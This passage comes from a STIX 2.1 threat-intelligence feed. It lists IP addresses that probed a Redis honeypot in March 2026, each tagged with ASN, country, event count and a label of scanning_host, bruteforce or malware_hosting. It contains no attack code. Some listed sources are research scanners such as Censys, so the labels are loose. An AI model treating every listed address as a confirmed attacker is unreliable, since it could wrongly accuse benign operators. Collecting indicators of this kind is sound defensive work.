      "modified": "2026-03-02T11:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.196.152.126']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T11:25:13.000Z",
      "valid_until": "2026-04-03T11:25:12.000Z"
    },
    {
      "created": "2026-03-02T11:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--273b5505-d7b0-4399-8f25-aed1b8535bf7",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T11:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.196.152.33']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T11:25:13.000Z",
      "valid_until": "2026-04-03T11:25:12.000Z"
    },
    {
      "created": "2026-03-02T12:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--08caf8e0-4e2f-4d47-a735-b92afa9c4b87",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T12:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '101.42.101.250']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T12:25:07.000Z",
      "valid_until": "2026-04-03T12:25:06.000Z"
    },
    {
      "created": "2026-03-02T12:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=27; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--f2ec1bda-ad99-4911-ab8e-5f7c38216e0b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T12:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.156.142']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T12:25:07.000Z",
      "valid_until": "2026-04-03T12:25:06.000Z"
    },
    {
      "created": "2026-03-02T12:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--ec3df7e5-e660-4c6e-9a60-60d7ee8ac11d",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T12:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.156.147']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T12:25:07.000Z",
      "valid_until": "2026-04-03T12:25:06.000Z"
    },
    {
      "created": "2026-03-02T12:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--9cc8bcba-044e-4c05-9933-db6454794cf0",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T12:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '68.183.104.22']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T12:25:07.000Z",
      "valid_until": "2026-04-03T12:25:06.000Z"
    },
    {
      "created": "2026-03-02T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--7934b6c9-1b9c-4ab9-9bef-ce89d93c003c",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '100.51.6.16']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T13:25:13.000Z",
      "valid_until": "2026-04-03T13:25:12.000Z"
    },
    {
      "created": "2026-03-02T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--1d998557-9c22-4151-af5a-ec9038b56068",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '172.236.96.75']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T13:25:13.000Z",
      "valid_until": "2026-04-03T13:25:12.000Z"
    },
    {
      "created": "2026-03-02T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--df87ef89-89ea-4a0c-ab73-1b5510360559",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.79.109.130']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T13:25:13.000Z",
      "valid_until": "2026-04-03T13:25:12.000Z"
    },
    {
      "created": "2026-03-02T14:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=TH; asn=135566; asn_org=National Telecom Public Company Limited; redis_cmd_hits=0",
      "id": "indicator--8a1f3516-c407-47cc-83fb-3cc2f975bb09",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T14:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '209.15.115.204']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T14:25:02.000Z",
      "valid_until": "2026-04-03T14:25:01.000Z"
    },
    {
      "created": "2026-03-02T14:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=GN; asn=37665; asn_org=MouNa; redis_cmd_hits=0",
      "id": "indicator--b73c0d4d-cddf-406e-ac87-edfd391f6db1",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T14:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '41.223.51.250']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T14:25:02.000Z",
      "valid_until": "2026-04-03T14:25:01.000Z"
    },
    {
      "created": "2026-03-02T15:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=NL; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--5ad5591e-b359-4fc5-b8c0-03eaf258a9ea",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T15:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '9.163.145.211']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T15:25:06.000Z",
      "valid_until": "2026-04-03T15:25:05.000Z"
    },
    {
      "created": "2026-03-02T16:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0",
      "id": "indicator--576ada6c-171e-4a69-867b-221128e6d11d",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T16:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '175.30.48.64']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T16:25:08.000Z",
      "valid_until": "2026-04-03T16:25:07.000Z"
    },
    {
      "created": "2026-03-02T16:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--898b1dff-54c8-4b7e-bd7a-2ca9e86b7e47",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T16:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '60.12.246.145']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T16:25:08.000Z",
      "valid_until": "2026-04-03T16:25:07.000Z"
    },
    {
      "created": "2026-03-02T18:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=PL; asn=16276; asn_org=OVH SAS; redis_cmd_hits=0",
      "id": "indicator--4c8fca13-3e87-4484-aa9a-6de69b5bd090",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T18:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '51.77.47.129']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T18:25:03.000Z",
      "valid_until": "2026-04-03T18:25:02.000Z"
    },
    {
      "created": "2026-03-02T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=AE; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--ec3848fb-75c9-45cd-9026-d02348362b61",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.233.204.10']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T19:25:13.000Z",
      "valid_until": "2026-04-03T19:25:12.000Z"
    },
    {
      "created": "2026-03-02T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--5aedd17a-a513-4c84-94c0-a553cbff61ca",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '24.144.119.78']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T19:25:13.000Z",
      "valid_until": "2026-04-03T19:25:12.000Z"
    },
    {
      "created": "2026-03-02T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--3a7b15d0-45e9-47bb-b88b-2418519e7d09",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.97.229.80']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T19:25:13.000Z",
      "valid_until": "2026-04-03T19:25:12.000Z"
    },
    {
      "created": "2026-03-02T20:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=17621; asn_org=China Unicom Shanghai network; redis_cmd_hits=0",
      "id": "indicator--319cf0ed-9adb-4c9f-9624-7d2cea07e0e3",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T20:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '106.75.241.127']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T20:25:12.000Z",
      "valid_until": "2026-04-03T20:25:11.000Z"
    },
    {
      "created": "2026-03-02T20:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0",
      "id": "indicator--f37c7241-c366-4e6e-abd6-b9f5bae15b04",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T20:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.242.226.22']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T20:25:12.000Z",
      "valid_until": "2026-04-03T20:25:11.000Z"
    },
    {
      "created": "2026-03-02T20:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--93462efe-f011-48c5-ba0c-f26f3ffbcdfc",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T20:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '199.45.154.145']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T20:25:12.000Z",
      "valid_until": "2026-04-03T20:25:11.000Z"
    },
    {
      "created": "2026-03-02T20:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--ea2bbb3a-8b49-4146-a010-87620c8414a6",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T20:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '199.45.154.188']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T20:25:12.000Z",
      "valid_until": "2026-04-03T20:25:11.000Z"
    },
    {
      "created": "2026-03-02T20:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--4d97ca37-f7d3-4d20-b748-965ca93f3ba3",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T20:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '199.45.154.32']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T20:25:12.000Z",
      "valid_until": "2026-04-03T20:25:11.000Z"
    },
    {
      "created": "2026-03-02T20:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--c390beb6-0e6a-4ba5-9a2f-6dc10bda804a",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T20:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '46.101.146.208']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T20:25:12.000Z",
      "valid_until": "2026-04-03T20:25:11.000Z"
    },
    {
      "created": "2026-03-02T21:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=8; ports=6379; cc=DE; asn=199912; asn_org=Layer7 Networks GmbH; cats=Generic Protocol Command Decode,Web Application Attack,Attempted Administrator Privilege Gain,Misc activity; redis_cmd_hits=0",
      "id": "indicator--b0efaae3-de8a-4427-ac24-07517bf9df9a",
      "labels": [
        "malware_hosting"
      ],
      "modified": "2026-03-02T21:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.55.240.152']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T21:25:14.000Z",
      "valid_until": "2026-04-03T21:25:13.000Z"
    },
    {
      "created": "2026-03-02T23:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=DE; asn=24940; asn_org=Hetzner Online GmbH; redis_cmd_hits=0",
      "id": "indicator--7be7a30c-6b56-4893-b8d5-9b7585b4c235",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-02T23:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '128.140.124.155']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T23:25:12.000Z",
      "valid_until": "2026-04-03T23:25:11.000Z"
    },
    {
      "created": "2026-03-02T23:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--762dc765-7b7a-4901-968d-f828e6b4ef3c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-02T23:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '223.76.108.98']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-02T23:25:12.000Z",
      "valid_until": "2026-04-03T23:25:11.000Z"
    },
    {
      "created": "2026-03-03T02:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--5f3068e6-512a-4e38-905d-a499a4f59c98",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T02:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '157.230.189.8']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T02:25:14.000Z",
      "valid_until": "2026-04-04T02:25:13.000Z"
    },
    {
      "created": "2026-03-03T02:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--ba15b796-fa83-45d0-9195-7f65692c7dbc",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T02:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '159.223.173.170']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T02:25:14.000Z",
      "valid_until": "2026-04-04T02:25:13.000Z"
    },
    {
      "created": "2026-03-03T03:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=141679; asn_org=China Telecom Beijing Tianjin Hebei Big Data Industry Park Branch; redis_cmd_hits=0",
      "id": "indicator--c03ac74d-6b04-4b18-b64d-0b092b410437",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T03:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '117.72.186.146']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T03:25:13.000Z",
      "valid_until": "2026-04-04T03:25:12.000Z"
    },
    {
      "created": "2026-03-03T03:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--0afb90bd-d805-4142-88d5-266f6567810d",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T03:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.111.110.34']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T03:25:13.000Z",
      "valid_until": "2026-04-04T03:25:12.000Z"
    },
    {
      "created": "2026-03-03T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=BR; asn=31898; asn_org=Oracle Corporation; cats=Generic Protocol Command Decode,Web Application Attack,Attempted Administrator Privilege Gain,Misc activity; redis_cmd_hits=0",
      "id": "indicator--c7a3fedd-5a4c-4958-b42f-ca85be8f21f6",
      "labels": [
        "malware_hosting"
      ],
      "modified": "2026-03-03T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '204.216.147.144']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T04:25:13.000Z",
      "valid_until": "2026-04-04T04:25:12.000Z"
    },
    {
      "created": "2026-03-03T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--c149f0be-6992-4410-af33-9742f1fef544",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-03T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '35.169.206.177']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T04:25:13.000Z",
      "valid_until": "2026-04-04T04:25:12.000Z"
    },
    {
      "created": "2026-03-03T05:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=AU; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--084294b8-47b2-4a8e-a719-a86d692588be",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T05:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '52.189.221.141']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T05:25:13.000Z",
      "valid_until": "2026-04-04T05:25:12.000Z"
    },
    {
      "created": "2026-03-03T06:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--138281f1-d114-436a-b568-de8c046a4ad3",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T06:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '147.185.132.51']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T06:25:13.000Z",
      "valid_until": "2026-04-04T06:25:12.000Z"
    },
    {
      "created": "2026-03-03T07:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=7; ports=6379; cc=TH; asn=56309; asn_org=Siamdata Communication Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--665227c3-c470-4302-8029-f8007b6f0752",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T07:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '157.85.96.220']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T07:25:02.000Z",
      "valid_until": "2026-04-04T07:25:01.000Z"
    },
    {
      "created": "2026-03-03T07:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=26496; asn_org=GoDaddy.com, LLC; redis_cmd_hits=0",
      "id": "indicator--27f8887f-3c48-4e2b-8be7-83983c6d4ca1",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T07:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '97.74.92.144']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T07:25:02.000Z",
      "valid_until": "2026-04-04T07:25:01.000Z"
    },
    {
      "created": "2026-03-03T08:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--e84caf7a-5abf-43ed-9b29-1a5159bcfdc0",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T08:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '119.45.248.246']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T08:25:13.000Z",
      "valid_until": "2026-04-04T08:25:12.000Z"
    },
    {
      "created": "2026-03-03T08:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=16; ports=6379; cc=NL; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--e52f12ce-e95f-403f-bcf7-9b3db2211858",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T08:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.224.128.16']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-03T08:25:13.000Z",
      "valid_until": "2026-04-04T08:25:12.000Z"
    },
    {
      "created": "2026-03-03T08:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--d24c39a4-52c4-4960-9fb0-de575ffc38ea",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-03T08:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '220.250.52.75']",
      "pattern_type": "stix",
